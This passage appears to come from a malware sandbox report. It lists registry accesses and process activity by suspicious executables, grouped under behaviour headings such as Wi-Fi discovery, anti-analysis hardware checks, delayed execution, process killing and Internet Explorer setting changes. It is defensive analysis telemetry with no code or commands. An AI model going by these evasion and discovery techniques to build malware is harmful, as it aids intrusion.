Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\main.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\choice.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\25072023.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\Opdxdyeul.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tftp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\euoxkxg\cqibun.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\a\0fVlNye.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\._cache_frap.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Desktop\Files\5_6190317556063017550.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\447331\Buyer.pif N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Desktop\Files\5_6190317556063017550.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Desktop\Files\build_2024-07-27_00-41.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Desktop\Files\build_2024-07-27_00-41.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\447331\Buyer.pif N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\net.exe N/A
N/A N/A C:\Windows\SysWOW64\net.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\iexplore.exe = "0" C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\Settings C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\Settings\LOCALMACHINE_CD_UNLOCK = "0" C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-2d-69-5d-86-0b\WpadDecisionTime = f8e31e226540db01 C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache C:\Windows\system32\svchost.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-2d-69-5d-86-0b\WpadDecisionTime = 7e27006f6540db01 C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-2d-69-5d-86-0b\WpadDecisionReason = "1" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\25\52C64B7E C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-2d-69-5d-86-0b C:\Windows\system32\svchost.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-2d-69-5d-86-0b\WpadDecisionTime = 93ee955a6540db01 C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-2d-69-5d-86-0b\WpadDecision = "0" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-2d-69-5d-86-0b\WpadDecisionTime = dcb48a826540db01 C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
